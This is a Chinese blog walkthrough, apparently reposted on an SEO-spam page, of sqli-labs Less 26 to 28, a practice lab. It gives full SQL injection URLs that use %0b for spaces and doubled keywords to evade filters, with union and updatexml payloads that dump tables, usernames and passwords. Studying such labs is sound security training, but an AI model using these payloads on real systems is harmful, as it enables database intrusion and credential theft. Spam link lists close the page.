当前位置: 首页 > wzjs >正文

常见电子商务网站基本模式网站仿制 个人

常见电子商务网站基本模式,网站仿制 个人,用iis搭建网站,html5创意网站前言 25关已经出现了初步的一些关键字过滤,通过双写可以绕过。后面的关卡,我们会遇到更多关键字过滤,需要各种技巧绕过。 Less26 第26关写了会过滤空格和注释符。有很多的答案,会用%a0替代空格,但据说这是sqli-labs部…

前言

25关已经出现了初步的一些关键字过滤,通过双写可以绕过。后面的关卡,我们会遇到更多关键字过滤,需要各种技巧绕过。

Less26

第26关写了会过滤空格和注释符。有很多的答案,会用%a0替代空格,但据说这是sqli-labs部署在在linux环境下的,而在windows环境下,我尝试了半天,只有用%0b可以替代空格。

 经过测试,我们发现为单引号闭合,并且会过滤掉各种空格,同时and和or也会被过滤:

http://localhost/sqli-labs/less-26/?id=1%27oorr%271%27=%271

 使用联合注入方式:

#测试回显
http://127.0.0.1/sqli-labs/less-26/?id=0'%0bunion%0bselect%0b1,2,3'#回显库名
http://127.0.0.1/sqli-labs/less-26/?id=0'%0bunion%0bselect%0b1,database(),3'#爆表名
http://127.0.0.1/sqli-labs/less-26/?id=0'%0bunion%0bselect%0b1,group_concat(table_name),3%0bfrom%0binfoorrmation_schema.tables%0bwhere%0btable_schema="security"'#爆列名
http://127.0.0.1/sqli-labs/less-26/?id=0'%0bunion%0bselect%0b1,group_concat(column_name),3%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_name="users"'#爆用户名密码
http://127.0.0.1/sqli-labs/less-26/?id=0'%0bunion%0bselect%0b1,group_concat(username),group_concat(passwoorrd)%0bfrom%0busers%0bwhere%0b'1'='1

使用报错注入:

#库名
http://127.0.0.1/sqli-labs/less-26/?id=0'||updatexml(1,concat(0x7e,database()),1)||'1'='1#表名,因为group_concat因为回显长度问题显示不全,可使用limit逐个列出
http://127.0.0.1/sqli-labs/less-26/?id=0'||updatexml(1,concat(0x7e,(SELECT(table_name)FROM(infoorrmation_schema.tables)where(table_schema="security")limit%0b0,1)),1)||'1'='1#列名
http://127.0.0.1/sqli-labs/less-26/?id=0'||updatexml(1,concat(0x7e,(SELECT(column_name)FROM(infoorrmation_schema.columns)where(table_name="users")limit%0b0,1)),1)||'1'='1#用户名密码
http://127.0.0.1/sqli-labs/less-26/?id=0'||updatexml(1,concat(0x7e,(SELECT(username)FROM(users)limit%0b0,1)),1)||'1'='1
http://127.0.0.1/sqli-labs/less-26/?id=0'||updatexml(1,concat(0x7e,(SELECT(passwoorrd)FROM(users)limit%0b0,1)),1)||'1'='1

Less26a

less26需要括号闭合。另外这关没有输出报错信息,因此不可使用报错注入。

#测试回显
http://127.0.0.1/sqli-labs/less-26a/?id=0')%0bunion%0bselect%0b1,2,('3#回显库名
http://127.0.0.1/sqli-labs/less-26a/?id=0')%0bunion%0bselect%0b1,(database()),3%0banandd('#爆表名
http://127.0.0.1/sqli-labs/less-26a/?id=0')%0bunion%0bselect%0b1,group_concat(table_name),3%0bfrom%0binfoorrmation_schema.tables%0bwhere%0btable_schema="security"aandnd ('1'='1#爆列名
http://127.0.0.1/sqli-labs/less-26a/?id=0')%0bunion%0bselect%0b1,group_concat(column_name),3%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_name="users"aandnd ('1'='1#爆用户名密码
http://127.0.0.1/sqli-labs/less-26a/?id=0')%0bunion%0bselect%0b1,group_concat(username),group_concat(passwoorrd)%0bfrom%0busers%0bwhere%0b('1'='1

Less27

27关与26关相比,减少了and和or的过滤,增加了select和union的过滤。前年我们已经知道了可以通过双写方式绕过,对于select,直接写成seselectlect就可以了。

#库名
http://127.0.0.1/sqli-labs/less-27/?id=0'||updatexml(1,concat(0x7e,database()),1)||'1'='1#表名,因为group_concat因为回显长度问题显示不全,可使用limit逐个列出
http://127.0.0.1/sqli-labs/less-27/?id=0'||updatexml(1,concat(0x7e,(SELSELECTECT(table_name)FROM(information_schema.tables)where(table_schema="security")limit%0b0,1)),1)||'1'='1#列名
http://127.0.0.1/sqli-labs/less-27/?id=0'||updatexml(1,concat(0x7e,(SELSELECTECT(column_name)FROM(information_schema.columns)where(table_name="users")limit%0b0,1)),1)||'1'='1#用户名密码
http://127.0.0.1/sqli-labs/less-27/?id=0'||updatexml(1,concat(0x7e,(SELSELECTECT(username)FROM(users)limit%0b0,1)),1)||'1'='1
http://127.0.0.1/sqli-labs/less-27/?id=0'||updatexml(1,concat(0x7e,(SELSELECTECT(password)FROM(users)limit%0b0,1)),1)||'1'='1

Less28

28关写的是会过滤union和select,但实际似乎没有过滤,所以完全按照26a关的模式就好了

#回显库名
http://localhost/sqli-labs/less-28/?id=0')%0bunion%0bselect%0b1,(database()),3%0band('#爆表名
http://localhost/sqli-labs/less-28/?id=0')%0bunion%0bselect%0b1,group_concat(table_name),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema="security"and ('1'='1#爆列名
http://localhost/sqli-labs/less-28/?id=0')%0bunion%0bselect%0b1,group_concat(column_name),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_name="users"and ('1'='1#爆用户名密码
http://localhost/sqli-labs/less-28/?id=0')%0bunion%0bselect%0b1,group_concat(username),group_concat(password)%0bfrom%0busers%0bwhere%0b('1'='1

小结

这几关都是讲关键字和符号过滤的。在ctf比赛中还有更变态的情况,把几乎所有关键字和空格都过滤了那种!


文章转载自:

http://gfc0b2aA.znrLg.cn
http://6LtaLRzW.znrLg.cn
http://WFkXAqfu.znrLg.cn
http://dDz2CuYO.znrLg.cn
http://0aDq6h4Q.znrLg.cn
http://Py9vBAdl.znrLg.cn
http://MsDaCAb5.znrLg.cn
http://khP26Z2z.znrLg.cn
http://4sk62FiO.znrLg.cn
http://v7TAvL5x.znrLg.cn
http://1fIbAn1e.znrLg.cn
http://94y1rr4s.znrLg.cn
http://7elTQAEI.znrLg.cn
http://M5lFCObJ.znrLg.cn
http://vB5SxrQ9.znrLg.cn
http://wqcqVIbt.znrLg.cn
http://598oHsmf.znrLg.cn
http://W6a0uLrn.znrLg.cn
http://E16qLXlE.znrLg.cn
http://8ReYbvKu.znrLg.cn
http://7QRlmxP8.znrLg.cn
http://4wXs5PhT.znrLg.cn
http://bwvmxp1L.znrLg.cn
http://llBq4xTr.znrLg.cn
http://u9VWNGqP.znrLg.cn
http://mFNrp52o.znrLg.cn
http://yaU9BNGf.znrLg.cn
http://ojwSL98z.znrLg.cn
http://ZEluIUSZ.znrLg.cn
http://hnKLpeaz.znrLg.cn
http://www.dtcms.com/wzjs/683038.html

相关文章:

  • 网络设置的网站wordpress安卓客户端
  • 部署一个网站大概多少钱网站建站建设多少钱
  • 山东网站建设优化一个域名可以做几个网站
  • 博客网站的建设宣传推广策略
  • 网站建设与规划案例门户地方网站 策略
  • 网站规则柳州建站
  • 哈尔滨做公司网站的公司有哪些知道ip域名如何进入网站
  • 自己本地可以做网站服务器高品质的网站设计制作
  • 网站后端开发软件ps做旅游网站
  • 门户网站代码结构公司架构体系搭建
  • 甘肃省建设厅建筑业信息网seo网络培训班
  • 信阳网站开发公司建设网站时候应该注意哪些
  • 合伙合同网站建设协议做装修网站卖钱
  • 云南省建设厅专家注册网站金阊苏州网站建设
  • wordpress 后台 插件seo教程免费分享
  • 网络营销知识网站教师网络培训和服务平台
  • 网站设计公司服务软件开发企业
  • 滑雪网站的建设seo好的外贸网站
  • 国外网站流量手工活外发一手货源
  • 中山市哪家公司做网站wordpress 后台502
  • 温州二井建设有限公司网站什么网站流量多
  • 网站开发需会的课程领导高度重视门户网站建设
  • 网站服务器是干什么的编程软件下载手机版
  • 网站建设银行业务预约纪念币猪年纪念币预约山东青岛最新消息
  • 自己网站做搜索引擎优化做网站送商标
  • 网站改名 备案创新的广州做网站
  • 北京注册公司需要什么云南seo整站优化报价
  • 建设工程项目管理网站百度公司地址在哪里
  • 做电商网站的公司做旅游攻略比较好的网站
  • 12306网站建设贵州省建设厅实名认证网站